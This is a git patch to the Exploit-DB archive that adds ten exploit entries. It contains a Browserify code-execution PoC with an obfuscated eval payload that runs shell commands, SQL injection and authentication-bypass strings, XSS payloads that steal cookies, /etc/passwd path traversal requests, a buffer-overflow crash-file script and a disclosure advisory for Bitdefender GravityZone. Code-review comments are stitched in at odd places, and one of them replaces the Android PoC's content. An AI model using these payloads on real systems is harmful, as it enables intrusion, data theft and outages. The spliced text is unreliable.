From bb76fb3805fa11da9a0fdf6e348154f7858df6ed Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 18 Jul 2014 04:40:01 +0000
Subject: [PATCH] Updated 07_18_2014
---
 files.csv | 10 ++
 platforms/android/remote/34088.html | 72 ++++++++++++
 platforms/jsp/webapps/34092.txt | 9 ++
 platforms/linux/webapps/34086.txt | 166 ++++++++++++++++++++++++++++
 platforms/multiple/dos/34090.py | 43 +++++++
 platforms/php/webapps/34087.txt | 51 +++++++++
 platforms/php/webapps/34091.txt | 16 +++
 platforms/php/webapps/34095.txt | 9 ++
 platforms/php/webapps/34096.txt | 9 ++
 platforms/php/webapps/34097.txt | 9 ++
 platforms/windows/dos/34094.pl | 14 +++
 11 files changed, 408 insertions(+)
 create mode 100755 platforms/android/remote/34088.html
 create mode 100755 platforms/jsp/webapps/34092.txt
 create mode 100755 platforms/linux/webapps/34086.txt
 create mode 100755 platforms/multiple/dos/34090.py
 create mode 100755 platforms/php/webapps/34087.txt
 create mode 100755 platforms/php/webapps/34091.txt
 create mode 100755 platforms/php/webapps/34095.txt
 create mode 100755 platforms/php/webapps/34096.txt
 create mode 100755 platforms/php/webapps/34097.txt
 create mode 100755 platforms/windows/dos/34094.pl
diff --git a/files.csv b/files.csv
index 384f0c248..25d7c5851 100755
--- a/files.csv
+++ b/files.csv
@@ -30694,3 +30694,13 @@ id,file,description,date,author,platform,type,port
 34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 'lang' Parameter Cross-Site Scripting Vulnerabilities",2009-12-30,emgent,php,webapps,0
 34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0
 34085,platforms/php/webapps/34085.txt,"Gigya Socialize Plugin 1.0/1.1.x for Wordpress Cross Site Scripting Vulnerability",2010-06-04,MustLive,php,webapps,0
+34086,platforms/linux/webapps/34086.txt,"Bitdefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443
+34087,platforms/php/webapps/34087.txt,"Joomla Youtube Gallery Component - SQL Injection Vulnerability",2014-07-16,"Pham Van Khanh",php,webapps,80
+34088,platforms/android/remote/34088.html,"Boat Browser 8.0 and 8.0.1 - Remote Code Execution Vulnerability",2014-07-16,c0otlass,android,remote,0
+34090,platforms/multiple/dos/34090.py,"Node Browserify 4.2.0 - Remote Code Execution Vulnerability",2014-07-16,"Cal Leeming",multiple,dos,0
+34091,platforms/php/webapps/34091.txt,"Pay Per Minute Video Chat Script 2.x SQL Injection and Multiple Cross Site Scripting Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps,0
+34092,platforms/jsp/webapps/34092.txt,"JForum 2.1.8 'bookmarks' Module Multiple HTML Injection Vulnerabilities",2010-06-06,"Adam Baldwin",jsp,webapps,0
+34094,platforms/windows/dos/34094.pl,"Aqua Real Screensaver '.ar' File Buffer Overflow Vulnerability",2010-01-15,R3d-D3V!L,windows,dos,0
+34095,platforms/php/webapps/34095.txt,"PonVFTP 'login.php' SQL Injection Vulnerability",2010-01-15,S2K9,php,webapps,0
+34096,platforms/php/webapps/34096.txt,"CuteSITE CMS 1.x manage/add_user.php user_id Parameter SQL Injection",2010-06-06,"High-Tech Bridge SA",php,webapps,0
+34097,platforms/php/webapps/34097.txt,"CuteSITE CMS 1.x manage/main.php fld_path Parameter XSS",2010-06-06,"High-Tech Bridge 
SA",php,webapps,0 diff --git a/platforms/android/remote/34088.html b/platforms/android/remote/34088.html new file mode 100755 index 000000000..571ad1e11 --- /dev/null +++ b/platforms/android/remote/34088.html @@ -0,0 +1,72 @@ + + + + + +CreatMalTxt POC - WebView + + + +
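Review bot: The new row for 34090 records `type` as `dos` and places the file under `platforms/multiple/dos/`, while the same row's description reads "Node Browserify 4.2.0 - Remote Code Execution Vulnerability" and the PoC's own docstring shows command output rather than a crash. Anyone filtering the index on `type` will miss this entry when looking for code-execution issues, so either the description or the `type`/path should be aligned; if the `dos` category was chosen deliberately at submission time, a short note in the row description would make that explicit.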

CreatMalTxt POC

+ +
+ + + + \ No newline at end of file diff --git a/platforms/jsp/webapps/34092.txt b/platforms/jsp/webapps/34092.txt new file mode 100755 index 000000000..7f5eb0c66 --- /dev/null +++ b/platforms/jsp/webapps/34092.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40600/info + +JForum is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +JForum 2.1.8 is vulnerable; other versions may also be affected. + +https://www.example.com/forum/bookmarks/insert/2/1.page?action=insertSave&description=&module=bookmarks&relation_id=1&relation_type=2&title=&visible=1 \ No newline at end of file diff --git a/platforms/linux/webapps/34086.txt b/platforms/linux/webapps/34086.txt new file mode 100755 index 000000000..ac1741649 --- /dev/null +++ b/platforms/linux/webapps/34086.txt 
@@ -0,0 +1,166 @@ +SEC Consult Vulnerability Lab Security Advisory < 20140716-3 > +======================================================================= + title: Multiple critical vulnerabilities + product: Bitdefender GravityZone + vulnerable version: <5.1.11.432 + fixed version: >=5.1.11.432 + impact: critical + homepage: http://www.bitdefender.com + found: 2014-05-22 + by: Stefan Viehböck + SEC Consult Vulnerability Lab + https://www.sec-consult.com +======================================================================= + +Vendor description: +------------------- +Bitdefender GravityZone lets enterprises control and protect the heterogeneous +environments of today. The solution combines highly optimized virtualization +aware security with leading detection technologies and a fresh, but proven, +architecture. It empowers administrators with features adapted to reduce the +daily security hassle and eliminate the need for point solutions with unified +protection across virtualized, physical, and mobile endpoints. Unlike other +solutions that bolt-on modules to an aging architecture, the GravityZone +Control Center dashboard has been designed specifically to unify monitoring +and security management in a single simple and accessible interface. + +Source: http://download.bitdefender.com/resources/media/materials/business/en/datasheet-gravityzone-brief.pdf + + +Business recommendation: +------------------------ +Attackers are able to completely compromise the Bitdefender GravityZone +solution as they can gain system and database level access. +Furthermore attackers can manage all endpoints. + +The Bitdefender GravityZone can be used as an entry point into the target +infrastructure (lateral movement, privilege escalation). + +It is highly recommended by SEC Consult not to use this software until a +thorough security review has been performed by security professionals and all +identified issues have been resolved. 
+ + +Vulnerability overview/description: +----------------------------------- +1) Unauthenticated local file disclosure (Web Console, Update Server) +Unauthenticated users can read arbitrary files from the filesystem with the +privileges of the "nginx" operating system user. These files include +configuration files containing sensitive information such as clear text +passwords which can be used in further attacks. + +Separate vulnerabilities affecting both Web Console and Update Server were +found. + + +2) Insecure service configuration / design issues +The MongoDB database which is offered via the network by default (TCP ports +27017, 28017) can be accessed using hardcoded credentials which can't be +changed. The overall system design requires the database to be accessible via +the network. +All relevant GravityZone configuration data can be accessed and changed. This +includes the user table. + +Excerpt from the documentation describing the TCP port 27017: +"Default port used by the Communication Server and Control Center to access +the Database." + + +3) Missing authentication +Authentication is not required for certain scripts in the web UI. This +allows unauthenticated attackers to execute administrative functions without +prior authentication. + + +Proof of concept: +----------------- +1) Unauthenticated local file disclosure (Web Console, Update Server) +Arbitrary files can be downloaded via a vulnerable script: +https:///webservice/CORE/downloadFullKitEpc/a/1?id=../../../../../etc/passwd + +The Update Server is vulnerable to local file disclosure as well. 
Arbitrary +files can be downloaded using the following HTTP request: + +GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 +Host: :7074 + +2) Insecure service configuration / Design issues +Attackers can connect to MongoDB on TCP ports 27017 and 28017 using the +following hardcoded credentials: +Username: +Password: + +Detailed proof of concept exploits have been removed for this vulnerability. + +3) Missing authentication +Authentication is not required for the following script: +/webservice/CORE/downloadSignedCsr (Unauthenticated certificate upload) + + + +Vulnerable / tested versions: +----------------------------- +The vulnerabilities have been verified to exist in GravityZone 5.1.5.386, +which was the most recent version at the time of discovery. + + + +Vendor contact timeline: +------------------------ +2014-05-26: Sending responsible disclosure policy and requesting encryption + keys. +2014-05-26: Vendor responds providing encryption keys. +2014-05-26: Sending advisory and proof of concept exploit via encrypted + channel. +2014-05-26: Vendor confirms receipt. +2014-06-04: Requesting status update. +2014-06-14: Vendor provides status update. Update will be released "End of + June". +2014-06-26: Vendor provides status update. Update for issue #1 and #3 will + be released June 30. Update for issue #2 will be released at the + end of July. +2014-06-27: Requesting info about other affected products. Clarifying + disclosure of issue #2. +2014-07-09: Vendor confirms that update for issue #1 and #3 has been shipped + and KB article for issue #2 will be released. +2014-07-15: Requesting version numbers of affected products. +2014-07-16: SEC Consult releases coordinated security advisory. + + + +Solution: +--------- +Update to a more recent version of Bitdefender GravityZone _and_ +implement mitigations for the issue #2. 
+ +More information can be found at: +http://www.bitdefender.com/support/how-to-configure-iptables-firewall-rules-on-gravityzone-for-restricting-outside-access-to-mongodatabase-1265.html + + +Workaround: +----------- +No workaround available. + + +Advisory URL: +------------- +https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm + + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +SEC Consult Vulnerability Lab + +SEC Consult +Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius + +Headquarter: +Mooslackengasse 17, 1190 Vienna, Austria +Phone: +43 1 8903043 0 +Fax: +43 1 8903043 15 + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +EOF Stefan Viehböck / @2014 \ No newline at end of file diff --git a/platforms/multiple/dos/34090.py b/platforms/multiple/dos/34090.py new file mode 100755 index 000000000..b4e15e5f7 --- /dev/null +++ b/platforms/multiple/dos/34090.py 
@@ -0,0 +1,43 @@ +#!/usr/bin/python + +""" +Browserify POC exploit + +http://iops.io/blog/browserify-rce-vulnerability/ + +To run, just do: + +$ python poc.py > exploit.js +$ browserify exploit.js +BITCH I TOLD YOU THIS SHIT IS FABULOUS +[[garbage output]] +},{}]},{},[1]) 00:08:32 up 12:29, 3 users, load average: 0.00, 0.02, 0.05 +uid=1001(foxx) gid=1001(foxx) groups=1001(foxx),27(sudo),105(fuse) + +You can also spawn() and create a connect back shell. + +Enjoy + +""" + +def charencode(string): + encoded='' + for char in string: + encoded=encoded+","+str(ord(char)) + return encoded[1:] + +plaintext = """ + var require = this.process.mainModule.require; + var sys = require('sys') + var exec = require('child_process').exec; + function puts(error, stdout, stderr) { sys.puts(stdout) } + exec("uptime && id", puts); + console.log("BITCH I TOLD YOU THIS SHIT IS FABULOUS"); +""" + +payload = charencode(plaintext) +final = "eval(String.fromCharCode(%s));" %(payload) + +print "});" +print final +print "(function(){" \ No newline at end of file diff --git a/platforms/php/webapps/34087.txt b/platforms/php/webapps/34087.txt new file mode 100755 index 000000000..9ca14e854 --- /dev/null +++ b/platforms/php/webapps/34087.txt 
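Review bot: `charencode` assembles the comma-separated code list by repeated concatenation and then strips the leading comma with `encoded[1:]`; the idiomatic form is `return ",".join(str(ord(char)) for char in string)`, which needs no slice and returns `''` for empty input just the same. The three bare `print` statements make the file Python 2 only, and `#!/usr/bin/python` may resolve to Python 3 on current systems, so a line such as `Requires Python 2 (bare print statements).` in the header docstring would spare a reader the SyntaxError. The docstring transcript also refers to `poc.py` while the committed file is `34090.py`; the two names should match.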
@@ -0,0 +1,51 @@ +# Exploit Title: Joomla component com_youtubegallery - SQL Injection +vulnerability +# Google Dork: inurl:index.php?option=com_youtubegallery +# Date: 15-07-2014 +# Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com) +# Vendor Homepage: http://www.joomlaboat.com/youtube-gallery +# Software Link: http://www.joomlaboat.com/youtube-gallery +# Version: 4.x ( 3.x maybe) +# Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3 +# CVE : CVE-2014-4960 + +Detail: +In line: 40, file: components\com_youtubegallery\models\gallery.php, +if parameter listid is int (or can cast to int), $listid and $themeid +will not santinized. +Source code: +40: if(JRequest::getInt('listid')) +41: { +42: //Shadow Box +43: $listid=JRequest::getVar('listid'); +44: +45: +46: //Get Theme +47: $m_themeid=(int)JRequest::getVar('mobilethemeid'); +48: if($m_themeid!=0) +49: { +50: if(YouTubeGalleryMisc::check_user_agent('mobile')) +51: $themeid=$m_themeid; +52: else +53: $themeid=JRequest::getVar('themeid'); +54: } +55: else +56: $themeid=JRequest::getVar('themeid'); +57: } +After, $themeid and $listid are used in line 86, 92. Two method +getVideoListTableRow and getThemeTableRow concat string to construct +sql query. So it is vulnerable to SQL Injection. +Source code: +86: if(!$this->misc->getVideoListTableRow($listid)) +87: { +88: echo '

No video found

'; +89: return false; +90: } +91: +92: if(!$this->misc->getThemeTableRow($themeid)) +93: { +94: echo '

No video found

'; +95: return false; +96: } + +# Site POF: http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700 diff --git a/platforms/php/webapps/34091.txt b/platforms/php/webapps/34091.txt new file mode 100755 index 000000000..f0bc52f9b --- /dev/null +++ b/platforms/php/webapps/34091.txt @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/40585/info + +Pay Per Minute Video Chat Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Cross-site scripting: + +http://www.example.com/P47H/admin/memberviewdetails.php?id=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E + +http://www.example.com/P47H/videos.php?model=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E + + +SQL-injection: + +http://www.example.com/P47H/index_ie.php?page=-666 diff --git a/platforms/php/webapps/34095.txt b/platforms/php/webapps/34095.txt new file mode 100755 index 000000000..4dbf7ba49 --- /dev/null +++ b/platforms/php/webapps/34095.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40608/info + +PonVFTP is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +The following example data is available: + +password: 'or' 1=1 \ No newline at end of file diff --git a/platforms/php/webapps/34096.txt b/platforms/php/webapps/34096.txt new file mode 100755 index 000000000..cabcded2a --- /dev/null 
+++ b/platforms/php/webapps/34096.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40612/info + +CuteSITE CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +CuteSITE CMS 1.5.0 is vulnerable; prior versions may also be affected. + +http://www.example.com/manage/add_user.php?user_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user%28%29,15,16 \ No newline at end of file diff --git a/platforms/php/webapps/34097.txt b/platforms/php/webapps/34097.txt new file mode 100755 index 000000000..5e24c62ef --- /dev/null +++ b/platforms/php/webapps/34097.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40612/info + +CuteSITE CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +CuteSITE CMS 1.5.0 is vulnerable; prior versions may also be affected. + +http://www.example.com/manage/main.php?fld_path=XXX%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \ No newline at end of file diff --git a/platforms/windows/dos/34094.pl b/platforms/windows/dos/34094.pl new file mode 100755 index 000000000..29292fb5f --- /dev/null +++ b/platforms/windows/dos/34094.pl 
@@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/40606/info + +Aqua Real Screensaver is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. + +Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed attacks will cause denial-of-service conditions. + +Aqua Real 1 and 2 are vulnerable; other versions may also be affected. + +#!c/perl/bin/ +my $file= "Crash.ar"; +my $boom="\x41" x 5000; +open(myfile,'>>Crash.ar') || die "Cannot Creat file\n\n"; +print myfile $boom; +print "Done..!~#\n"; \ No newline at end of file
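Review bot: `open(myfile,'>>Crash.ar') || die "Cannot Creat file\n\n";` uses a bareword handle and a two-arg open with the mode embedded in the string, opens in append mode so every run grows `Crash.ar` beyond the 5000 bytes the script intends, and ignores the `$file` variable declared on the line above; the handle is never closed, so a buffered write error would go unreported. Prefer `open my $fh, '>', $file or die "Cannot create $file: $!";`, `print {$fh} $boom;` and `close $fh or die "close $file: $!";`, with `use strict; use warnings;` at the top. The eight advisory lines above `#!c/perl/bin/` are not comments, so the file as committed is not runnable Perl; prefixing them with `#` (or moving them into POD) would fix that, and the shebang path itself looks malformed.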